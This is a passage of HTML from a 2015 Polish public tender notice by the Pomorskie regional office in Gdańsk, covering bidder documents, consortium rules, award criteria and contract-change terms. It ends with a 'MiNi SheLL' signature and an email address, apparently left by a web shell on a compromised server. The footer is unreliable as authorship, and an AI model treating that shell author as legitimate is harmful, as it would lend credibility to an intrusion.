Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 2 do SIWZ) oraz dokumentów, o których mowa w rozdz. VI ust. 1 pkt 5 SIWZ, które również wskazano w niniejszym ogłoszeniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W prowadzonym postępowaniu mogą uczestniczyć Wykonawcy, którzy wykazali brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Prawo zamówień publicznych.
Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie
3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, chyba że Wykonawca udowodni, 
że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.

W celu potwierdzenia wykazania spełniania opisanych wyżej warunków udziału w postępowaniu Wykonawca musi załączyć do oferty dokumenty i oświadczenia określone w SIWZ. Zamawiający dokona oceny wykazania spełnienia powyższych warunków na podstawie złożonych przez Wykonawcę,  a wymaganych w SIWZ dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia. 


4.	Udział w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku spółki cywilnej Zamawiający, w rozumieniu art. 2 ust. 11 ustawy Prawo zamówień publicznych przyjmuje, że wykonawcami są wspólnicy spółki cywilnej, których udział w postępowaniu 
       traktowany jest jako wspólne ubieganie się o udzielenie zamówienia w rozumieniu art. 23 
ust. 1 ustawy Prawo zamówień publicznych
2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
3)	Wykonawcy, o których mowa w pkt 1, ponoszą solidarną odpowiedzialność za wykonanie zamówienia. 
4)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty, o których mowa w rozdziale VI  ust. 2 pkt 1-2 oraz w ust. 3 SIWZ.
5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą łącznie Formularz oferty oraz jeden komplet dokumentów, o których mowa w rozdziale VI ust. 1 pkt 1-5 SIWZ. Dokumenty te powinny być przygotowane w taki sposób, aby Zamawiający mógł dowiedzieć się, jaki udział w wykonaniu zamówienia będzie miał każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
5.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale VI ust. 2 pkt 2 SIWZ - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
6.	Dokumenty, o których mowa w pkt  5 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 5, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy,  złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy pkt  6.
8.	Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność 
z oryginałem przez wykonawcę - z wyjątkiem dokumentów wskazanych w pkt 10 niniejszego rozdziału. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega za zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów -  poświadczone za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty. Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski.
9.	Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia,  w  szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 
10.	Dokumenty, o których mowa w niniejszym rozdziale, tj. rozdział VI ust. 1 pkt 1, 
ust. 3  i ust. 9 SIWZ muszą być złożone w oryginale lub kserokopii poświadczonej notarialnie. 
11.	Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt  9, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
12.	Brak jakiegokolwiek z dokumentów wymaganych w SIWZ, lub złożenie dokumentu  
w niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania oraz uznanie jego oferty za odrzuconą,  z zastrzeżeniem pkt 13  niniejszego rozdziału.
13.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzające spełnienie:
a)	warunków udziału w postępowaniu 
b)	wymagań określonych przez Zamawiającego lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa 
w pkt a) i b), zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia 
w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin gwarancji jakości przedmiotu zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie istotne  zmiany zawartej Umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, będą odbywać się na warunkach określonych we wzorze umowy (załącznik nr 8  do SIWZ), tj.§ 15 od ust. 9 do 16 Wynagrodzenie i sposób płatności

9.	W przypadku zmiany stawki podatku od towarów i usług (VAT) w trakcie obowiązywania Umowy, Strony postanawiają, że do wynagrodzenia netto doliczany będzie podatek od towarów i usług według nowej stawki od momentu wejścia w życie nowej stawki podatku VAT. Wynagrodzenie netto pozostanie niezmienne, zmianie ulegnie jedynie wynagrodzenie brutto.
10.	W przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-5 ustawy z dnia 10 października 2002r o minimalnym wynagrodzeniu za pracę (Dz. U. z 2002 Nr 200 poz.1679 ze zm.) lub zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, wynagrodzenie brutto, o którym mowa w ust. 1, ulegnie odpowiednim zmianom. 
11.	Każdorazowo przed wprowadzeniem zmiany wynagrodzenia brutto, o której mowa w ust. 10, Wykonawca jest obowiązany przedstawić Zamawiającemu, w terminie 30 dni od dnia wejścia w życie przepisów, na piśmie, wpływ zmian na koszty wykonania zamówienia oraz propozycję nowego wynagrodzenia, potwierdzone powołaniem się na stosowne przepisy, z których wynikają w/w zmiany. 
12.	Zmiana wynagrodzenia brutto następuje po uzyskaniu akceptacji Wykonawcy i Zamawiającego, w formie aneksu do umowy. 
13.	Wykonawca jest zobowiązany, w związku z możliwością zmian wskazanych w ust. 10, przedłożyć w dniu zawarcia umowy zestawienie ilościowe:
1.	pracowników, którzy będą realizować zamówienie objęte niniejszą umową, z wyodrębnieniem liczby pracowników otrzymujących minimalne wynagrodzenie, o którym mowa w przepisach ustawy o minimalnym wynagrodzeniu za pracę 
2.	osób innych niż pracownicy, od których wynagrodzeń odprowadzane są składki zdrowotne i na ubezpieczenie społeczne, 
wraz ze wskazaniem średniej liczby godzin w miesiącu zaangażowania w realizację zamówienia objętego niniejszą umową oraz wysokości wynagrodzenia (odrębnie dla każdego pracownika/osoby lub ewentualnie grupy pracowników/osób). Wykonawca jest zobowiązany zgłosić Zamawiającemu zmianę danych zawartych w zestawieniu w terminie 7 dni od dnia zaistnienia zmiany. 
14.	W przypadku wystąpienia Wykonawcy o zmianę wysokości wynagrodzenia za wykonanie przedmiotu umowy z przyczyn określonych w ust. 10, jest on zobowiązany do udostępnienia Zamawiającemu wiarygodnych dokumentów uzasadniających złożony wniosek, w tym w szczególności: list obecności, list płac ze wskazaniem wysokości wynagrodzenia i składek na ubezpieczenie społeczne i zdrowotne dot. osób realizujących zamówienie objęte niniejszą umową. 
15.	Zamawiający jest uprawniony do weryfikacji złożonych dokumentów, wskazanych w ust. 14, żądania złożenia dodatkowych wyjaśnień oraz jest uprawniony do sprawdzania rzeczywistego stanu na placu budowy. 
16.	Nieprzedłożenie lub odmowa udostępnienia dokumentów, o których mowa w ust. 14-15 przez Wykonawcę lub niezłożenie wyjaśnień lub niezgodność z prawdą przedłożonych dokumentów lub wyjaśnień uprawnia Zamawiającego do odmowy wyrażenia zgody na podwyższenie wysokości wynagrodzenia za wykonanie umowy. 

§ 19 Zmiana w treści umowy
1.	Zamawiający stosownie do treści  art. 144 ust.1 ustawy, przewiduje możliwość 
zmiany terminu wykonania robót w przypadkach:
a)	natrafienia na różnego rodzaju wykopaliska (zabytki) i związana z tym konieczność 
	prowadzenia prac archeologicznych,
b)  wystąpienia siły wyższej, przez którą rozumie się okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz którym nie można zapobiec lub przeciwstawić się skutecznie.
2.  Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w przypadkach określonych w niniejszej umowie i wymagają pisemnego aneksu pod rygorem nieważności.
3.  Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pomorskie.eu/Article/id,12.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego 
ul. Okopowa 21/27 80-810 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2015 godzina 09:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Pomorskiego ul. Okopowa 21 /27, 80-810 Gdańsk, pokój nr  4a (czynna w dni robocze: od pon do piątku od godz. 7.45 do godz. 15.45).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej 12 Działanie 12.1 Pomoc Techniczna Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com